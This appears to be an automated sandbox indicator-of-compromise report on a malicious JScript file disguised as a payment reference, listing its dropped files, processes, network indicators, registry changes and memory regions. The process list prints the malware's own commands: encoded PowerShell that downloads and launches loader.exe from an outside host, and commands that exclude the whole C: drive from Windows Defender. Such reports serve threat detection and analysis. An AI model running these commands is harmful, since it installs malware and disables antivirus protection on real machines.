IOC Report
Payment reference no. - FT910298955674.js

loading gifFilesProcessesURLsDomainsIPsRegistryMemdumps10864201,00010010Label

Files

File Path
Type
Category
Malicious
Download
Payment reference no. - FT910298955674.js
ASCII text, with very long lines (1531), with CRLF line terminators
initial sample
malicious
C:\ProgramData\mkwain\logs.dat
data
dropped
malicious
C:\Users\user\AppData\Local\Temp\loader.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\Links\Xdnxwtne.PIF
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\ProgramData\39949.cmd
Unicode text, UTF-8 text, with very long lines (577), with CRLF line terminators
dropped
C:\ProgramData\5058.cmd
Unicode text, UTF-8 text, with very long lines (324), with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Network\Downloader\edb.log
data
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Extensible storage engine DataBase, version 0x620, checksum 0x5248fd5b, page size 16384, DirtyShutdown, Windows version 10.0
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
data
dropped
C:\ProgramData\neo.cmd
Unicode text, UTF-8 text, with very long lines (372), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
modified
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_443qv3aj.fhm.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5qdtfwtx.xqs.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bi0owcnx.fth.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_enrqj4kr.jb0.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hmrxrlcq.zgw.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ncizkrmy.r5g.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ntvpqkyb.q2a.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pz2dhkbu.yck.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sybwy1i1.j2w.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t4qei31t.z1m.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\Links\Xdnxwtne.url
MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\user\\Links\\Xdnxwtne.PIF">), ASCII text, with CRLF line terminators
modified
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
JSON data
dropped
There are 13 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment reference no. - FT910298955674.js"
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Payment reference no. - FT910298955674.js" /elevate
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAIgBDADoAXAANAAoA
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cgBlAGcAIABhAGQAZAAgACIASABLAEwATQBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAEUAeABjAGwAdQBzAGkAbwBuAHMAXABQAGEAdABoAHMAIgAgAC8AdgAgAEMAOgBcAA==
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBuAGEAdwBhAHQAYgBzAGMALgBjAG8AbQAvAGYAaQBsAGUALwBsAG8AYQBkAGUAcgAuAGUAeABlACIACgAkAG8AdQB0AHAAdQB0ACAAPQAgACIAJABlAG4AdgA6AFQAZQBtAHAALwBsAG8AYQBkAGUAcgAuAGUAeABlACIACgBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAbAAgAC0ATwB1AHQARgBpAGwAZQAgACQAbwB1AHQAcAB1AHQACgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAG8AdQB0AHAAdQB0AA==
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath " C:\
malicious
C:\Windows\System32\reg.exe
"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /v C:\
malicious
C:\Users\user\AppData\Local\Temp\loader.exe
"C:\Users\user~1\AppData\Local\Temp\loader.exe"
malicious
C:\Windows\SysWOW64\colorcpl.exe
C:\Windows\System32\colorcpl.exe
malicious
C:\Users\user\Links\Xdnxwtne.PIF
"C:\Users\user\Links\Xdnxwtne.PIF"
malicious
C:\Windows\SysWOW64\colorcpl.exe
C:\Windows\System32\colorcpl.exe
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\wbem\WmiPrvSE.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\5058.cmd""
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\39949.cmd""
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
There are 10 hidden processes, click here to show them.

URLs

Name
IP
Malicious
bb990a9a6fafe.duckdns.org
malicious
http://nuget.org/NuGet.exe
unknown
https://go.microsoft.c
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://schemas.xmlsoap.org/soap/encoding/
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
http://www.nawatbsc.com
unknown
https://go.micro
unknown
http://www.microsoft.co
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://g.live.com/odclientsettings/ProdV21C:
unknown
http://crl.mi8
unknown
http://crl.ver)
unknown
https://github.com/Pester/Pester
unknown
http://geoplugin.net/json.gp
unknown
https://g.live.com/odclientsettings/Prod1C:
unknown
http://geoplugin.net/json.gp/C
unknown
http://schemas.xmlsoap.org/wsdl/
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
http://crl.mC5Pys
unknown
https://aka.ms/pscore68
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://crl.v
unknown
http://www.pmail.com
unknown
http://www.nawatbsc.com/file/loader.exe
185.208.156.66
There are 17 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
bb990a9a6fafe.duckdns.org
146.70.83.186
malicious
www.nawatbsc.com
185.208.156.66

IPs

IP
Domain
Country
Malicious
103.186.117.225
unknown
unknown
malicious
185.208.156.66
www.nawatbsc.com
Switzerland
127.0.0.1
unknown
unknown

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths
C:\
malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
JScriptSetScriptStateStarted
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Xdnxwtne
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\1e\417C44EB
@%systemroot%\system32\colorui.dll,-1400
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ICM\ProfileAssociations\Print\Fax
UsePerUserProfiles
HKEY_CURRENT_USER\SOFTWARE\makwin-04NDKU
exepath
HKEY_CURRENT_USER\SOFTWARE\makwin-04NDKU
licence
HKEY_CURRENT_USER\SOFTWARE\makwin-04NDKU
time
HKEY_CURRENT_USER\SOFTWARE\makwin-04NDKU
UID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
PerfMMFileName
There are 14 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
Download
7FAE0000
direct allocation
page read and write
malicious
2C30000
heap
page read and write
malicious
2370000
direct allocation
page read and write
malicious
400000
direct allocation
page execute and read and write
malicious
6C70000
remote allocation
page execute and read and write
malicious
7FFB9AC20000
trusted library allocation
page read and write
1CC57A52000
heap
page read and write
9EE9A7E000
stack
page read and write
7E460000
direct allocation
page read and write
2C4DFE70000
heap
page read and write
2244000
direct allocation
page read and write
19396FA9000
heap
page read and write
1CC576E0000
heap
page read and write
C65DFFE000
stack
page read and write
2154E000
stack
page read and write
220B000
direct allocation
page read and write
193B0E6E000
heap
page read and write
2C61000
heap
page read and write
1E41A826000
trusted library allocation
page read and write
28B9000
direct allocation
page read and write
1CC3D860000
heap
page read and write
1E418B20000
heap
page read and write
292D000
direct allocation
page read and write
C65DB58000
stack
page read and write
193B0E73000
heap
page read and write
2402BCFF000
heap
page read and write
2CA9000
heap
page read and write
2ADE000
stack
page read and write
9B000
stack
page read and write
21990000
trusted library allocation
page read and write
B18CBCE000
stack
page read and write
235EA33D000
heap
page read and write
1CC578E0000
heap
page read and write
1E41A83A000
trusted library allocation
page read and write
2C4E17F0000
heap
page read and write
1CC576EE000
heap
page read and write
7ECD0000
direct allocation
page read and write
2B12DDD0000
heap
page read and write
7EBA0000
direct allocation
page read and write
B18BAFF000
stack
page read and write
20E33000
direct allocation
page read and write
7FFB9ACB0000
trusted library allocation
page read and write
1CC4091F000
trusted library allocation
page read and write
235EA19E000
heap
page read and write
7FFB9AC20000
trusted library allocation
page read and write
235EA1B4000
heap
page read and write
24031170000
trusted library allocation
page read and write
7FB00000
direct allocation
page read and write
2B12FC0D000
heap
page read and write
29D47690000
heap
page read and write
7FFC0C632000
unkown
page readonly
2D5C000
heap
page read and write
1E41A774000
trusted library allocation
page read and write
2402BC2B000
heap
page read and write
2C4E3468000
trusted library allocation
page read and write
235EA1B4000
heap
page read and write
19396F20000
heap
page read and write
24031080000
trusted library allocation
page read and write
7DF40A620000
trusted library allocation
page execute and read and write
1CC4F8DB000
trusted library allocation
page read and write
7DF40C1B0000
trusted library allocation
page execute and read and write
1E4189D4000
heap
page read and write
1CC3D840000
trusted library allocation
page read and write
2C52000
heap
page read and write
7E9C0000
direct allocation
page read and write
2F98000
heap
page read and write
74C000
heap
page read and write
7FFB9AB00000
trusted library allocation
page execute and read and write
235EBF23000
heap
page read and write
29F0000
heap
page read and write
1E418AF0000
heap
page readonly
1CC4055E000
trusted library allocation
page read and write
2C4F9DE0000
heap
page read and write
2CD9000
heap
page read and write
2C4DFCEF000
heap
page read and write
B18CDCE000
stack
page read and write
2B12DCC0000
heap
page read and write
7FFB9ABC0000
trusted library allocation
page execute and read and write
7FFB9ACD0000
trusted library allocation
page read and write
2C00000
heap
page read and write
7FFB9AB90000
trusted library allocation
page execute and read and write
2B12FBFA000
heap
page read and write
2B12DEA9000
heap
page read and write
2110F000
stack
page read and write
6FBF67E000
unkown
page readonly
7FFB9AA8C000
trusted library allocation
page execute and read and write
67205FF000
stack
page read and write
B18C0FC000
stack
page read and write
19396F6F000
heap
page read and write
1E432921000
heap
page read and write
2A3B000
stack
page read and write
1939903A000
trusted library allocation
page read and write
2B12DDE0000
heap
page read and write
20D10000
direct allocation
page read and write
1E432995000
heap
page read and write
2C4F9F1B000
heap
page read and write
7FFB9A9D4000
trusted library allocation
page read and write
7FFB9AC60000
trusted library allocation
page read and write
650000
heap
page read and write
235EA17B000
heap
page read and write
21880000
trusted library allocation
page read and write
7FFB9AC00000
trusted library allocation
page read and write
2C4DFCCF000
heap
page read and write
21990000
direct allocation
page execute and read and write
E1CEA4D000
stack
page read and write
1E41A82F000
trusted library allocation
page read and write
1CC57A40000
heap
page read and write
2C4E17D0000
heap
page execute and read and write
7FFB9AD38000
trusted library allocation
page read and write
7FFB9A9F0000
trusted library allocation
page read and write
4F4E000
stack
page read and write
1E42A711000
trusted library allocation
page read and write
193991E4000
trusted library allocation
page read and write
7FFB9AD40000
trusted library allocation
page read and write
19396F67000
heap
page read and write
E1CD673000
stack
page read and write
7FFC0C630000
unkown
page read and write
34E0000
heap
page read and write
193B1090000
heap
page execute and read and write
2402C51A000
heap
page read and write
2402C51A000
heap
page read and write
3021000
direct allocation
page execute read
59950FE000
stack
page read and write
2403121F000
heap
page read and write
1CC4F611000
trusted library allocation
page read and write
2B12DDDC000
heap
page read and write
4F8F000
stack
page read and write
7FFB9AC90000
trusted library allocation
page read and write
76C000
heap
page read and write
24031304000
heap
page read and write
1CC409A4000
trusted library allocation
page read and write
2270000
heap
page read and write
7FFB9ABA0000
trusted library allocation
page execute and read and write
7FFB9AA90000
trusted library allocation
page read and write
7DF40A630000
trusted library allocation
page execute and read and write
2162F000
stack
page read and write
240310E9000
trusted library allocation
page read and write
1E42A744000
trusted library allocation
page read and write
19398D4F000
trusted library allocation
page read and write
1CC3D865000
heap
page read and write
7FFB9ABC2000
trusted library allocation
page read and write
2926000
direct allocation
page read and write
1E4189CF000
heap
page read and write
C65E5FD000
stack
page read and write
2E2F000
stack
page read and write
1E41A82C000
trusted library allocation
page read and write
9EE98FD000
stack
page read and write
7FFB9ABB2000
trusted library allocation
page read and write
474000
unkown
page read and write
240311E0000
trusted library allocation
page read and write
2188B000
heap
page read and write
1CC3F5D0000
heap
page execute and read and write
2124F000
stack
page read and write
2C4E17D6000
heap
page execute and read and write
19396F5F000
heap
page read and write
7FFB9A9ED000
trusted library allocation
page execute and read and write
2C4DFCD1000
heap
page read and write
1CC4069E000
trusted library allocation
page read and write
B18B7CF000
stack
page read and write
1CC57A33000
heap
page read and write
19396F61000
heap
page read and write
2C59000
heap
page read and write
2B12DDDD000
heap
page read and write
7FFB9AA9C000
trusted library allocation
page execute and read and write
7FAF7000
direct allocation
page read and write
1CC57690000
trusted library allocation
page read and write
1E43298C000
heap
page read and write
7FFB9A9E0000
trusted library allocation
page read and write
2402C691000
trusted library allocation
page read and write
235EA192000
heap
page read and write
24031091000
trusted library allocation
page read and write
5E0000
heap
page read and write
59951FF000
stack
page read and write
67204FD000
stack
page read and write
19398810000
heap
page read and write
2402CB80000
trusted library allocation
page read and write
1CC57A10000
heap
page read and write
7FFB9AC70000
trusted library allocation
page read and write
9EE9673000
stack
page read and write
7FFC0C635000
unkown
page readonly
2510000
heap
page read and write
7FFB9ADC3000
trusted library allocation
page read and write
4844000
heap
page read and write
2C4DFD17000
heap
page read and write
1CC40E6D000
trusted library allocation
page read and write
2164F000
stack
page read and write
2B12DE90000
heap
page read and write
7FC10000
direct allocation
page read and write
7FFB9ACB0000
trusted library allocation
page read and write
7EDDF000
direct allocation
page read and write
7ED50000
direct allocation
page read and write
7FFB9AC00000
trusted library allocation
page read and write
6FBE379000
stack
page read and write
7FFB9AAC6000
trusted library allocation
page execute and read and write
19398C60000
heap
page execute and read and write
7ED50000
direct allocation
page read and write
2220000
direct allocation
page read and write
19398B80000
heap
page readonly
7E98F000
direct allocation
page read and write
E1CD7FE000
stack
page read and write
2C4F9F4D000
heap
page read and write
235EBF17000
heap
page read and write
235EA188000
heap
page read and write
1CC3D590000
heap
page read and write
2470000
heap
page read and write
1CC40883000
trusted library allocation
page read and write
19D000
stack
page read and write
2840000
direct allocation
page read and write
19398C00000
trusted library allocation
page read and write
19398815000
heap
page read and write
7E690000
direct allocation
page read and write
19396F15000
heap
page read and write
235EA14A000
heap
page read and write
7FFB9AC10000
trusted library allocation
page read and write
2113000
heap
page read and write
1E418A19000
heap
page read and write
1CC40551000
trusted library allocation
page read and write
9EE9AFE000
stack
page read and write
7A8000
heap
page read and write
1E4329C9000
heap
page read and write
9EE9DBE000
stack
page read and write
298A000
heap
page read and write
2402BBE0000
trusted library allocation
page read and write
7FFB9A9DD000
trusted library allocation
page execute and read and write
1E418B50000
heap
page read and write
7FFB9A9D0000
trusted library allocation
page read and write
2114F000
stack
page read and write
672073E000
stack
page read and write
C65E1FF000
stack
page read and write
193B0E39000
heap
page read and write
24031070000
trusted library allocation
page read and write
B18C17E000
stack
page read and write
2E3D000
stack
page read and write
7FFB9AAA0000
trusted library allocation
page execute and read and write
2B12DE20000
heap
page read and write
19396F10000
heap
page read and write
7FFB9AB9A000
trusted library allocation
page read and write
9EE997F000
stack
page read and write
1E43299E000
heap
page read and write
31CF000
stack
page read and write
2C4F1D43000
trusted library allocation
page read and write
1E418930000
heap
page read and write
6FBE8FE000
stack
page read and write
7FFC0C635000
unkown
page readonly
7FFB9AB81000
trusted library allocation
page read and write
2B12DE90000
heap
page read and write
2120000
heap
page read and write
2240000
direct allocation
page execute and read and write
7FFB9ABD0000
trusted library allocation
page read and write
19398DE4000
trusted library allocation
page read and write
1E41A79F000
trusted library allocation
page read and write
1E42A724000
trusted library allocation
page read and write
7FFB9AA9C000
trusted library allocation
page execute and read and write
1E4189F0000
heap
page read and write
2402BC7D000
heap
page read and write
2402BCA0000
heap
page read and write
2C4E34C1000
trusted library allocation
page read and write
7FFC0C611000
unkown
page execute read
7FFB9AB90000
trusted library allocation
page execute and read and write
240310D0000
trusted library allocation
page read and write
1CC40D61000
trusted library allocation
page read and write
235EA19D000
heap
page read and write
1CC4054D000
trusted library allocation
page read and write
235EA18D000
heap
page read and write
7FC01000
direct allocation
page read and write
6FBF47E000
unkown
page readonly
7FFB9AA80000
trusted library allocation
page read and write
2126000
heap
page read and write
7ED40000
direct allocation
page read and write
7EE0B000
direct allocation
page read and write
7F9F0000
direct allocation
page read and write
7FADA000
direct allocation
page read and write
7E78F000
direct allocation
page read and write
7E760000
direct allocation
page read and write
2C4E32B2000
trusted library allocation
page read and write
2AE5000
heap
page read and write
1CC3F3C0000
trusted library allocation
page read and write
E1CE90D000
stack
page read and write
7FFB9AB8A000
trusted library allocation
page read and write
19396DD0000
heap
page read and write
6B70000
heap
page read and write
1F850000
heap
page read and write
240312F8000
heap
page read and write
20D18000
direct allocation
page read and write
19398DD0000
trusted library allocation
page read and write
6FBEF7E000
unkown
page readonly
7FFB9AA8C000
trusted library allocation
page execute and read and write
235EA198000
heap
page read and write
20D94000
direct allocation
page read and write
63E000
stack
page read and write
2402BC00000
heap
page read and write
6C0000
heap
page read and write
2C4F1CE4000
trusted library allocation
page read and write
19398DD6000
trusted library allocation
page read and write
7FFB9ABF0000
trusted library allocation
page read and write
7FFB9AB72000
trusted library allocation
page read and write
7FFC0C626000
unkown
page readonly
7FFB9A9D3000
trusted library allocation
page execute and read and write
2C4F9D0E000
heap
page read and write
2423000
direct allocation
page read and write
7E66F000
direct allocation
page read and write
9EE977E000
stack
page read and write
7FFB9AD40000
trusted library allocation
page read and write
7FFB9AC80000
trusted library allocation
page read and write
2402C402000
heap
page read and write
7FFB9AC50000
trusted library allocation
page read and write
657000
heap
page read and write
19D000
stack
page read and write
6FBDF7E000
stack
page read and write
2B12DE90000
heap
page read and write
7EC63000
direct allocation
page read and write
6FBE27E000
unkown
page readonly
7FFB9ACD0000
trusted library allocation
page read and write
1CC577D0000
heap
page read and write
19398D24000
trusted library allocation
page read and write
B18B783000
stack
page read and write
2402BC91000
heap
page read and write
2C4F1CDF000
trusted library allocation
page read and write
6FBE97E000
unkown
page readonly
1E432990000
heap
page read and write
7FFB9AA96000
trusted library allocation
page read and write
1CC576D0000
heap
page execute and read and write
6370000
trusted library allocation
page read and write
193B0ED6000
heap
page read and write
2114E000
stack
page read and write
2261000
direct allocation
page read and write
1CC40701000
trusted library allocation
page read and write
7FFB9A9D3000
trusted library allocation
page execute and read and write
1E42A71F000
trusted library allocation
page read and write
474000
unkown
page write copy
21630000
heap
page read and write
235E9FB0000
heap
page read and write
240311D0000
trusted library allocation
page read and write
7F980000
direct allocation
page read and write
2D4F000
stack
page read and write
19396FA7000
heap
page read and write
235EA191000
heap
page read and write
7FFC0C632000
unkown
page readonly
7FFB9ACA0000
trusted library allocation
page read and write
2268000
direct allocation
page read and write
1CC3D616000
heap
page read and write
2EC0000
heap
page read and write
7FFB9ABE0000
trusted library allocation
page read and write
7FFB9AC70000
trusted library allocation
page read and write
193B0E20000
heap
page read and write
19398C80000
heap
page execute and read and write
6FBED7E000
unkown
page readonly
478000
unkown
page read and write
E1CD77D000
stack
page read and write
235EA330000
heap
page read and write
B18BDF9000
stack
page read and write
747000
heap
page read and write
240312E5000
heap
page read and write
E1CEB4C000
stack
page read and write
7FFB9AB8A000
trusted library allocation
page read and write
1CC5771A000
heap
page read and write
7FFB9ACA0000
trusted library allocation
page read and write
7FFB9AAB6000
trusted library allocation
page execute and read and write
2B12DDA0000
heap
page read and write
7FFB9A9E3000
trusted library allocation
page execute and read and write
1CC4F8EB000
trusted library allocation
page read and write
1CC3F808000
trusted library allocation
page read and write
2C4F9D75000
heap
page read and write
6D0000
heap
page read and write
2402CCA0000
trusted library section
page readonly
7ECE0000
direct allocation
page read and write
99F000
stack
page read and write
240D000
direct allocation
page read and write
2C4E1690000
heap
page readonly
2212000
direct allocation
page read and write
7FA0A000
direct allocation
page read and write
2C4DFC99000
heap
page read and write
2E50000
heap
page read and write
9EE9EBE000
stack
page read and write
295C000
heap
page read and write
7F630000
direct allocation
page read and write
21661000
heap
page read and write
5994EFE000
stack
page read and write
7FFB9AD00000
trusted library allocation
page read and write
2C4E32BD000
trusted library allocation
page read and write
79F000
heap
page read and write
7FFB9ABA0000
trusted library allocation
page execute and read and write
20F4E000
stack
page execute and read and write
2B12DEDD000
heap
page read and write
7FFB9ADC0000
trusted library allocation
page read and write
7E2C0000
direct allocation
page read and write
B18CC4A000
stack
page read and write
237F000
stack
page read and write
1CC3D5D3000
heap
page read and write
2C4F1D04000
trusted library allocation
page read and write
1CC413BB000
trusted library allocation
page read and write
7FFB9ACD0000
trusted library allocation
page read and write
672015E000
stack
page read and write
7FFB9ACE0000
trusted library allocation
page read and write
7FFB9AB91000
trusted library allocation
page read and write
2B12DDDB000
heap
page read and write
2139F000
stack
page read and write
7FB30000
direct allocation
page read and write
2C4DFEE5000
heap
page read and write
2C4F9EE0000
heap
page execute and read and write
1CC578F9000
heap
page read and write
2B12DDDB000
heap
page read and write
74A000
heap
page read and write
313C000
heap
page read and write
2100000
heap
page read and write
7FFB9ADD0000
trusted library allocation
page read and write
B18BF7B000
stack
page read and write
B18BFFE000
stack
page read and write
2C4F9D0C000
heap
page read and write
21650000
trusted library allocation
page read and write
71E000
stack
page read and write
7FFB9ACC0000
trusted library allocation
page read and write
7FFB9AC70000
trusted library allocation
page read and write
E1CD8FF000
stack
page read and write
7FFB9AC00000
trusted library allocation
page read and write
7FFB9ABB0000
trusted library allocation
page execute and read and write
7FFB9AE00000
trusted library allocation
page execute and read and write
21660000
heap
page read and write
19396F7F000
heap
page read and write
6FBE17C000
stack
page read and write
1CC40555000
trusted library allocation
page read and write
7E600000
direct allocation
page read and write
4DCF000
stack
page read and write
2C4F9CD0000
heap
page read and write
6FBF07E000
stack
page read and write
7FFB9AC10000
trusted library allocation
page read and write
2CB0000
heap
page read and write
193B10B0000
heap
page read and write
293C000
stack
page read and write
7FFB9AE20000
trusted library allocation
page read and write
7FFB9AA80000
trusted library allocation
page read and write
2C4F9D66000
heap
page read and write
5FE000
stack
page read and write
7FFB9ABE0000
trusted library allocation
page read and write
2B12F8A0000
heap
page read and write
2C4F9D9D000
heap
page read and write
193B1460000
heap
page read and write
19396EB0000
heap
page read and write
21641000
heap
page read and write
21AC4000
heap
page read and write
2954000
heap
page read and write
235EBF20000
heap
page read and write
9EE96FE000
stack
page read and write
1CC57CD0000
heap
page read and write
E1CDCBE000
stack
page read and write
7FFB9AC20000
trusted library allocation
page read and write
7ECA3000
direct allocation
page read and write
2C4E1F02000
trusted library allocation
page read and write
7FFB9AB80000
trusted library allocation
page read and write
2FF0000
direct allocation
page readonly
6FBE57C000
stack
page read and write
24031430000
remote allocation
page read and write
7FFB9AD00000
trusted library allocation
page read and write
79B000
heap
page read and write
7ED50000
direct allocation
page read and write
E1CDEBB000
stack
page read and write
1CC576D7000
heap
page execute and read and write
2C62000
heap
page read and write
7FFB9AE50000
trusted library allocation
page read and write
5B0000
heap
page read and write
7FFB9ACF0000
trusted library allocation
page read and write
B18CCC7000
stack
page read and write
7F980000
direct allocation
page read and write
6FBFBFE000
stack
page read and write
6DE000
heap
page read and write
1CC40549000
trusted library allocation
page read and write
7FFB9AA86000
trusted library allocation
page read and write
2C4DFC40000
heap
page read and write
4840000
heap
page read and write
7FFC0C635000
unkown
page readonly
7FFB9A9EB000
trusted library allocation
page read and write
2C4DFC30000
heap
page read and write
2B12DE32000
heap
page read and write
193B0EAE000
heap
page read and write
672093E000
stack
page read and write
240311C0000
trusted library allocation
page read and write
6FBF27E000
unkown
page readonly
2B12DE64000
heap
page read and write
2182F000
direct allocation
page read and write
2402BCB0000
heap
page read and write
1E418AE0000
heap
page read and write
2D7D000
heap
page read and write
E1CDDBE000
stack
page read and write
47F000
unkown
page readonly
21891000
heap
page read and write
2B12DE93000
heap
page read and write
2124F000
stack
page read and write
24031160000
trusted library allocation
page read and write
2C3B000
heap
page read and write
B18C07E000
stack
page read and write
2D7D000
heap
page read and write
1CC3F430000
heap
page read and write
1CC4F601000
trusted library allocation
page read and write
7FFB9ABB2000
trusted library allocation
page read and write
193B0EAB000
heap
page read and write
1CC3D7E0000
heap
page read and write
193991C7000
trusted library allocation
page read and write
7FFC0C610000
unkown
page readonly
2B12DE9B000
heap
page read and write
19398C66000
heap
page execute and read and write
1E418A87000
heap
page read and write
2402BC40000
heap
page read and write
9EE9D3E000
stack
page read and write
2C4E3826000
trusted library allocation
page read and write
240310D4000
trusted library allocation
page read and write
59954FE000
stack
page read and write
7E8D0000
direct allocation
page read and write
24031160000
trusted library allocation
page read and write
6FBF57B000
stack
page read and write
4D0C000
stack
page read and write
59956FB000
stack
page read and write
193987C0000
heap
page read and write
639000
heap
page read and write
2B12FBF1000
heap
page read and write
1E418B55000
heap
page read and write
214FE000
stack
page read and write
67206F9000
stack
page read and write
2C4E17E0000
heap
page read and write
67201DE000
stack
page read and write
672047E000
stack
page read and write
2402BAB0000
heap
page read and write
2B12DE8F000
heap
page read and write
7FFB9AC30000
trusted library allocation
page read and write
2C4DFCDB000
heap
page read and write
2B12DE89000
heap
page read and write
2438000
direct allocation
page read and write
1E41A72B000
trusted library allocation
page read and write
7FFB9AE30000
trusted library allocation
page read and write
E1CDB37000
stack
page read and write
2C36000
heap
page read and write
2F40000
heap
page read and write
2D0E000
stack
page read and write
20F4B000
stack
page read and write
7FFC0C630000
unkown
page read and write
240312C9000
heap
page read and write
3017000
direct allocation
page read and write
6FBE47E000
unkown
page readonly
7FFC0C632000
unkown
page readonly
6FBE67E000
unkown
page readonly
7FFB9AA90000
trusted library allocation
page execute and read and write
2B12DE61000
heap
page read and write
2C4DFC60000
heap
page read and write
2C4F9F5E000
heap
page read and write
